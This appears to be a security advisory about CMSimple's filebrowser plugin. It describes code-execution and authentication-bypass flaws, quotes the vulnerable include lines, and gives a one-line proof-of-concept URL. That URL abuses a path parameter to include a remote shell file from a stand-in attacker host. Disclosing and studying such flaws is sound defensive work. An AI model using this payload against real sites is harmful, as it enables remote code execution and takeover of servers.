30 lines
No EOL
1.3 KiB
Text
Executable file
30 lines
No EOL
1.3 KiB
Text
Executable file
source: http://www.securityfocus.com/bid/68961/info
|
|
|
|
CMSimple is prone to multiple security vulnerabilities including:
|
|
|
|
1. Multiple arbitrary PHP code-execution vulnerabilities
|
|
2. A weak authentication security-bypass vulnerability
|
|
3. Multiple security vulnerabilities
|
|
|
|
An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks.
|
|
|
|
vulnerable file "http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php"
|
|
|
|
Vulnerable Code :
|
|
-----------------------------------vulnerable Code----------------------------------------
|
|
|
|
require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
|
|
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';
|
|
|
|
exploit Code :
|
|
-------------------------------------PoC----------------------------------------
|
|
|
|
http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?
|
|
|
|
also embedded These files :
|
|
CMSimple/2lang/index.php
|
|
CMSimple/2site/index.php
|
|
CMSimple/cmsimple/cms.php
|
|
CMSimple/index.php
|
|
CMSimple/plugins/index.php
|
|
|